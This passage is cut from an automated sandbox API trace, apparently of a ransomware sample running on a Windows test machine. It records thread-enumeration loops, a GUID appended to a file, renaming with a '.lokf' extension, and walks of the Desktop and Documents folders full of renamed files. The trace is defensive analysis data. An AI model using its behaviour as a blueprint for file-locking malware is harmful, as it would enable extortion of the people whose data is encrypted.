lpte=0x391f434) returned 1 [0148.152] GetTickCount () returned 0x1134f78 [0148.152] GetCurrentThreadId () returned 0x35c [0148.152] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x64) returned 0x7bea78 [0148.152] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bea78 | out: hHeap=0x6e0000) returned 1 [0148.152] Thread32Next (hSnapshot=0x630, lpte=0x391f434) returned 1 [0148.153] GetTickCount () returned 0x1134f78 [0148.153] GetCurrentThreadId () returned 0x35c [0148.153] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x64) returned 0x7bea78 [0148.153] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bea78 | out: hHeap=0x6e0000) returned 1 [0148.153] Thread32Next (hSnapshot=0x630, lpte=0x391f434) returned 1 [0148.153] GetTickCount () returned 0x1134f78 [0148.153] GetCurrentThreadId () returned 0x35c [0148.153] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x64) returned 0x7bea78 [0148.153] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bea78 | out: hHeap=0x6e0000) returned 1 [0148.153] Thread32Next (hSnapshot=0x630, lpte=0x391f434) returned 1 [0148.154] GetTickCount () returned 0x1134f78 [0148.154] GetCurrentThreadId () returned 0x35c [0148.154] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x64) returned 0x7bea78 [0148.154] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bea78 | out: hHeap=0x6e0000) returned 1 [0148.154] Thread32Next (hSnapshot=0x630, lpte=0x391f434) returned 1 [0148.155] GetTickCount () returned 0x1134f78 [0148.155] GetCurrentThreadId () returned 0x35c [0148.155] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x64) returned 0x7bea78 [0148.155] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bea78 | out: hHeap=0x6e0000) returned 1 [0148.155] Thread32Next (hSnapshot=0x630, lpte=0x391f434) returned 1 [0148.155] GetTickCount () returned 0x1134f78 [0148.155] GetCurrentThreadId () returned 0x35c [0148.155] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x64) returned 0x7bea78 [0148.155] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bea78 | out: hHeap=0x6e0000) returned 1 [0148.155] Thread32Next (hSnapshot=0x630, lpte=0x391f434) returned 1 [0148.156] GetTickCount () returned 0x1134f78 [0148.156] GetCurrentThreadId () returned 0x35c [0148.156] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x64) returned 0x7bea78 [0148.156] Thread32Next (hSnapshot=0x630, lpte=0x391f434) returned 1 [0148.157] GetTickCount () returned 0x1134f78 [0148.157] GetCurrentThreadId () returned 0x35c [0148.157] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x64) returned 0x7bea78 [0148.157] Thread32Next (hSnapshot=0x630, lpte=0x391f434) returned 1 [0148.157] GetTickCount () returned 0x1134f78 [0148.157] Thread32Next (hSnapshot=0x630, lpte=0x391f434) returned 1 [0148.158] GetTickCount () returned 0x1134f78 [0148.158] Thread32Next (hSnapshot=0x630, lpte=0x391f434) returned 1 [0148.158] GetTickCount () returned 0x1134f78 [0148.158] Thread32Next (hSnapshot=0x630, lpte=0x391f434) returned 1 [0148.159] GetTickCount () returned 0x1134f78 [0148.159] Thread32Next (hSnapshot=0x630, lpte=0x391f434) returned 1 [0148.159] GetTickCount () returned 0x1134f78 [0148.160] Thread32Next (hSnapshot=0x630, lpte=0x391f434) returned 1 [0148.160] GetTickCount () returned 0x1134f78 [0148.160] Thread32Next (hSnapshot=0x630, lpte=0x391f434) returned 1 [0148.161] GetTickCount () returned 0x1134f78 [0148.161] Thread32Next (hSnapshot=0x630, lpte=0x391f434) returned 1 [0148.161] GetTickCount () returned 0x1134f78 [0148.161] Thread32Next (hSnapshot=0x630, lpte=0x391f434) returned 1 [0148.162] GetTickCount () returned 0x1134f78 [0148.162] Thread32Next (hSnapshot=0x630, lpte=0x391f434) returned 1 [0148.162] GetTickCount () returned 0x1134f78 [0148.162] Thread32Next (hSnapshot=0x630, lpte=0x391f434) returned 1 [0148.163] GetTickCount () returned 0x1134f78 [0148.163] Thread32Next (hSnapshot=0x630, lpte=0x391f434) returned 1 [0148.164] GetTickCount () returned 0x1134f78 [0148.164] Thread32Next (hSnapshot=0x630, lpte=0x391f434) returned 1 [0148.164] GetTickCount () returned 0x1134f78 [0148.164] Thread32Next (hSnapshot=0x630, lpte=0x391f434) returned 1 [0148.165] GetTickCount () returned 0x1134f87 [0148.165] Thread32Next (hSnapshot=0x630, lpte=0x391f434) returned 1 [0148.165] GetTickCount () returned 0x1134f87 [0148.165] Thread32Next (hSnapshot=0x630, lpte=0x391f434) returned 1 [0148.166] GetTickCount () returned 0x1134f87 [0148.166] Thread32Next (hSnapshot=0x630, lpte=0x391f434) returned 1 [0148.166] GetTickCount () returned 0x1134f87 [0148.166] Thread32Next (hSnapshot=0x630, lpte=0x391f434) returned 1 [0148.167] GetTickCount () returned 0x1134f87 [0148.167] Thread32Next (hSnapshot=0x630, lpte=0x391f434) returned 1 [0148.168] GetTickCount () returned 0x1134f87 [0148.168] Thread32Next (hSnapshot=0x630, lpte=0x391f434) returned 1 [0148.168] GetTickCount () returned 0x1134f87 [0148.168] Thread32Next (hSnapshot=0x630, lpte=0x391f434) returned 1 [0148.169] GetTickCount () returned 0x1134f87 [0148.169] Thread32Next (hSnapshot=0x630, lpte=0x391f434) returned 1 [0148.169] GetTickCount () returned 0x1134f87 [0148.169] Thread32Next (hSnapshot=0x630, lpte=0x391f434) returned 1 [0148.170] GetTickCount () returned 0x1134f87 [0148.170] Thread32Next (hSnapshot=0x630, lpte=0x391f434) returned 1 [0148.170] GetTickCount () returned 0x1134f87 [0148.170] Thread32Next (hSnapshot=0x630, lpte=0x391f434) returned 1 [0148.171] GetTickCount () returned 0x1134f87 [0148.171] Thread32Next (hSnapshot=0x630, lpte=0x391f434) returned 1 [0148.172] GetTickCount () returned 0x1134f87 [0148.172] Thread32Next (hSnapshot=0x630, lpte=0x391f434) returned 1 [0148.172] GetTickCount () returned 0x1134f87 [0148.172] Thread32Next (hSnapshot=0x630, lpte=0x391f434) returned 1 [0148.173] GetTickCount () returned 0x1134f87 [0148.173] Thread32Next (hSnapshot=0x630, lpte=0x391f434) returned 1 [0148.173] GetTickCount () returned 0x1134f87 [0148.173] Thread32Next (hSnapshot=0x630, lpte=0x391f434) returned 1 [0148.174] GetTickCount () returned 0x1134f87 [0148.174] Thread32Next (hSnapshot=0x630, lpte=0x391f434) returned 1 [0148.174] GetTickCount () returned 0x1134f87 [0148.174] Thread32Next (hSnapshot=0x630, lpte=0x391f434) returned 1 [0148.175] GetTickCount () returned 0x1134f87 [0148.175] Thread32Next (hSnapshot=0x630, lpte=0x391f434) returned 1 [0148.176] GetTickCount () returned 0x1134f87 [0148.176] Thread32Next (hSnapshot=0x630, lpte=0x391f434) returned 1 [0148.176] GetTickCount () returned 0x1134f87 [0148.227] FreeLibrary (hLibModule=0x75d20000) returned 1 [0148.228] QueryPerformanceCounter (in: lpPerformanceCount=0x391efa4 | out: lpPerformanceCount=0x391efa4*=8735527523) returned 1 [0148.228] GlobalMemoryStatus (in: lpBuffer=0x391f414 | out: lpBuffer=0x391f414) [0148.229] SetFilePointerEx (in: hFile=0x620, liDistanceToMove=0xb7e00, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0148.229] WriteFile (in: hFile=0x620, lpBuffer=0x3a66068*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x391fb50, lpOverlapped=0x0 | out: lpBuffer=0x3a66068*, lpNumberOfBytesWritten=0x391fb50*=0x100, lpOverlapped=0x0) returned 1 [0148.229] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0148.229] WriteFile (in: hFile=0x620, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x391fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x391fb50*=0x26, lpOverlapped=0x0) returned 1 [0148.229] CloseHandle (hObject=0x620) returned 1 [0148.229] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\penelop0611_2019-11-06_10-30.exe_.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\penelop0611_2019-11-06_10-30.exe_.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\penelop0611_2019-11-06_10-30.exe_.exe.lokf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\penelop0611_2019-11-06_10-30.exe_.exe.lokf")) returned 1 [0148.231] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x70223930, ftCreationTime.dwHighDateTime=0x1d4c59f, ftLastAccessTime.dwLowDateTime=0x3e9161e0, ftLastAccessTime.dwHighDateTime=0x1d4cb7e, ftLastWriteTime.dwLowDateTime=0x20255070, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x9862, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="PxUe0Rd33Z0Hx10IeT1.avi.lokf", cAlternateFileName="PXUE0R~1.LOK")) returned 1 [0148.231] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\PxUe0Rd33Z0Hx10IeT1.avi.lokf") returned=".lokf" [0148.231] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2b199ca0, ftCreationTime.dwHighDateTime=0x1d4c95c, ftLastAccessTime.dwLowDateTime=0x28af6960, ftLastAccessTime.dwHighDateTime=0x1d4d22e, ftLastWriteTime.dwLowDateTime=0x2027b1d0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0xeade, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="PYWZYi4ZS-zguXaIZa.m4a.lokf", cAlternateFileName="PYWZYI~1.LOK")) returned 1 [0148.231] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\PYWZYi4ZS-zguXaIZa.m4a.lokf") returned=".lokf" [0148.231] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2005db70, ftCreationTime.dwHighDateTime=0x1d4c8a9, ftLastAccessTime.dwLowDateTime=0xf90a9030, ftLastAccessTime.dwHighDateTime=0x1d4cafe, ftLastWriteTime.dwLowDateTime=0x2027b1d0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0xdc04, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="P_559lEWKFJGdNawoW.jpg.lokf", cAlternateFileName="P_559L~1.LOK")) returned 1 [0148.231] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\P_559lEWKFJGdNawoW.jpg.lokf") returned=".lokf" [0148.231] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x64df4910, ftCreationTime.dwHighDateTime=0x1d4c599, ftLastAccessTime.dwLowDateTime=0x63d6a3f0, ftLastAccessTime.dwHighDateTime=0x1d4c59f, ftLastWriteTime.dwLowDateTime=0x202a1330, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x11b6d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="QXU6sWcq.flv.lokf", cAlternateFileName="QXU6SW~1.LOK")) returned 1 [0148.231] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\QXU6sWcq.flv.lokf") returned=".lokf" [0148.231] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78546840, ftCreationTime.dwHighDateTime=0x1d4c855, ftLastAccessTime.dwLowDateTime=0xc6db8660, ftLastAccessTime.dwHighDateTime=0x1d4d3f9, ftLastWriteTime.dwLowDateTime=0x202a1330, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x848a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RrXB-.m4a.lokf", cAlternateFileName="RRXB-M~1.LOK")) returned 1 [0148.231] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\RrXB-.m4a.lokf") returned=".lokf" [0148.231] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdeca1840, ftCreationTime.dwHighDateTime=0x1d4c729, ftLastAccessTime.dwLowDateTime=0x6ffe2130, ftLastAccessTime.dwHighDateTime=0x1d4d0e9, ftLastWriteTime.dwLowDateTime=0x202a1330, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x168d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="SbEH25_9Y82gEZUNcsj.flv.lokf", cAlternateFileName="SBEH25~1.LOK")) returned 1 [0148.231] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\SbEH25_9Y82gEZUNcsj.flv.lokf") returned=".lokf" [0148.231] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe204e7f0, ftCreationTime.dwHighDateTime=0x1d4c568, ftLastAccessTime.dwLowDateTime=0x7121a170, ftLastAccessTime.dwHighDateTime=0x1d4d43d, ftLastWriteTime.dwLowDateTime=0x202c7490, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x1c21, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="SzTS.pps.lokf", cAlternateFileName="SZTSPP~1.LOK")) returned 1 [0148.231] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\SzTS.pps.lokf") returned=".lokf" [0148.231] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x59f7c60, ftCreationTime.dwHighDateTime=0x1d4cd21, ftLastAccessTime.dwLowDateTime=0x34f8fc90, ftLastAccessTime.dwHighDateTime=0x1d4c6da, ftLastWriteTime.dwLowDateTime=0x202c7490, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x11ee6, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="U7Qf8.mp4.lokf", cAlternateFileName="U7QF8M~1.LOK")) returned 1 [0148.231] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\U7Qf8.mp4.lokf") returned=".lokf" [0148.232] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfcbeda60, ftCreationTime.dwHighDateTime=0x1d4c9a5, ftLastAccessTime.dwLowDateTime=0x429e60b0, ftLastAccessTime.dwHighDateTime=0x1d4cf86, ftLastWriteTime.dwLowDateTime=0x202ed5f0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x1592a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="vXRE_K.mp3.lokf", cAlternateFileName="VXRE_K~1.LOK")) returned 1 [0148.232] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\vXRE_K.mp3.lokf") returned=".lokf" [0148.232] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe0c201d0, ftCreationTime.dwHighDateTime=0x1d4c904, ftLastAccessTime.dwLowDateTime=0x42cadd20, ftLastAccessTime.dwHighDateTime=0x1d4cb8f, ftLastWriteTime.dwLowDateTime=0x202ed5f0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0xe900, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="xJT0OcisPj-xq.jpg.lokf", cAlternateFileName="XJT0OC~1.LOK")) returned 1 [0148.232] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xJT0OcisPj-xq.jpg.lokf") returned=".lokf" [0148.232] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x964ee260, ftCreationTime.dwHighDateTime=0x1d4d045, ftLastAccessTime.dwLowDateTime=0xfe86900, ftLastAccessTime.dwHighDateTime=0x1d4ca9e, ftLastWriteTime.dwLowDateTime=0x20313750, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x37bd, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="xrWMPRPigWwu3vXxOU1.wav.lokf", cAlternateFileName="XRWMPR~1.LOK")) returned 1 [0148.232] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xrWMPRPigWwu3vXxOU1.wav.lokf") returned=".lokf" [0148.232] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4e17eff0, ftCreationTime.dwHighDateTime=0x1d4cb54, ftLastAccessTime.dwLowDateTime=0x1b3496f0, ftLastAccessTime.dwHighDateTime=0x1d4d2b2, ftLastWriteTime.dwLowDateTime=0x20313750, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0xb8f8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ZoOnp.swf.lokf", cAlternateFileName="ZOONPS~1.LOK")) returned 1 [0148.232] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZoOnp.swf.lokf") returned=".lokf" [0148.232] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x87a6ff20, ftCreationTime.dwHighDateTime=0x1d4c859, ftLastAccessTime.dwLowDateTime=0xa6491760, ftLastAccessTime.dwHighDateTime=0x1d4c6e7, ftLastWriteTime.dwLowDateTime=0x203398b0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x16f54, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ZyTEBApAQsy0 u.jpg.lokf", cAlternateFileName="ZYTEBA~1.LOK")) returned 1 [0148.232] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZyTEBApAQsy0 u.jpg.lokf") returned=".lokf" [0148.232] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xacfc63a0, ftCreationTime.dwHighDateTime=0x1d4cc87, ftLastAccessTime.dwLowDateTime=0x1dec9680, ftLastAccessTime.dwHighDateTime=0x1d4c9a8, ftLastWriteTime.dwLowDateTime=0x203398b0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x100e7, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="z_xjT1PbK9g5.mp3.lokf", cAlternateFileName="Z_XJT1~1.LOK")) returned 1 [0148.232] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\z_xjT1PbK9g5.mp3.lokf") returned=".lokf" [0148.232] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x891324e0, ftCreationTime.dwHighDateTime=0x1d4c9af, ftLastAccessTime.dwLowDateTime=0x27cace10, ftLastAccessTime.dwHighDateTime=0x1d4d123, ftLastWriteTime.dwLowDateTime=0x2035fa10, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0xc191, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_FKxFEiW.m4a.lokf", cAlternateFileName="_FKXFE~1.LOK")) returned 1 [0148.232] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_FKxFEiW.m4a.lokf") returned=".lokf" [0148.232] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x891324e0, ftCreationTime.dwHighDateTime=0x1d4c9af, ftLastAccessTime.dwLowDateTime=0x27cace10, ftLastAccessTime.dwHighDateTime=0x1d4d123, ftLastWriteTime.dwLowDateTime=0x2035fa10, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0xc191, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_FKxFEiW.m4a.lokf", cAlternateFileName="_FKXFE~1.LOK")) returned 0 [0148.232] FindClose (in: hFindFile=0x3220d58 | out: hFindFile=0x3220d58) returned 1 [0148.232] PeekMessageW (in: lpMsg=0x391ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391ff08) returned 0 [0148.232] PeekMessageW (in: lpMsg=0x391fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391fb74) returned 0 [0148.232] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="Documents\\" [0148.232] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0148.233] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0148.233] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0148.233] PathFindFileNameW (pszPath="") returned="" [0148.233] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\*", lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x20528a90, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x20528a90, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3220d58 [0148.233] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x20528a90, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x20528a90, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0148.233] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4c20130, ftCreationTime.dwHighDateTime=0x1d577a5, ftLastAccessTime.dwLowDateTime=0x93ba5690, ftLastAccessTime.dwHighDateTime=0x1d58578, ftLastWriteTime.dwLowDateTime=0x20385b70, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x15e9e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="-zw2kUwzHbrh6GhQEKb.pptx.lokf", cAlternateFileName="-ZW2KU~1.LOK")) returned 1 [0148.233] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\-zw2kUwzHbrh6GhQEKb.pptx.lokf") returned=".lokf" [0148.233] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xecfb9bf0, ftCreationTime.dwHighDateTime=0x1d50c7f, ftLastAccessTime.dwLowDateTime=0x2fc13690, ftLastAccessTime.dwHighDateTime=0x1d577c2, ftLastWriteTime.dwLowDateTime=0x20385b70, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x15855, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="0LcY86kifJlQ7.xlsx.lokf", cAlternateFileName="0LCY86~1.LOK")) returned 1 [0148.233] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\0LcY86kifJlQ7.xlsx.lokf") returned=".lokf" [0148.233] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7f32e340, ftCreationTime.dwHighDateTime=0x1d55107, ftLastAccessTime.dwLowDateTime=0x21972140, ftLastAccessTime.dwHighDateTime=0x1d55d7f, ftLastWriteTime.dwLowDateTime=0x203abcd0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0xcbfd, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="44yienfP0_mk.docx.lokf", cAlternateFileName="44YIEN~1.LOK")) returned 1 [0148.233] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\44yienfP0_mk.docx.lokf") returned=".lokf" [0148.233] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1145690, ftCreationTime.dwHighDateTime=0x1d57765, ftLastAccessTime.dwLowDateTime=0xfd31b9f0, ftLastAccessTime.dwHighDateTime=0x1d58e75, ftLastWriteTime.dwLowDateTime=0x203d1e30, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0xf0dd, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="4QdlKGracmIsfBv8Rj5U.xlsx.lokf", cAlternateFileName="4QDLKG~1.LOK")) returned 1 [0148.233] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\4QdlKGracmIsfBv8Rj5U.xlsx.lokf") returned=".lokf" [0148.233] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf11920f0, ftCreationTime.dwHighDateTime=0x1d52a6f, ftLastAccessTime.dwLowDateTime=0xc46c52d0, ftLastAccessTime.dwHighDateTime=0x1d5104c, ftLastWriteTime.dwLowDateTime=0x203d1e30, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0xdfa3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="aam-uk.xlsx.lokf", cAlternateFileName="AAM-UK~1.LOK")) returned 1 [0148.233] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\aam-uk.xlsx.lokf") returned=".lokf" [0148.233] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb1cdeff0, ftCreationTime.dwHighDateTime=0x1d4d53a, ftLastAccessTime.dwLowDateTime=0xe5b9dae0, ftLastAccessTime.dwHighDateTime=0x1d4ce82, ftLastWriteTime.dwLowDateTime=0x203f7f90, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x122b5, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ahBvw6Tj3LoXOmjTDa.pptx.lokf", cAlternateFileName="AHBVW6~1.LOK")) returned 1 [0148.233] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\ahBvw6Tj3LoXOmjTDa.pptx.lokf") returned=".lokf" [0148.233] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: 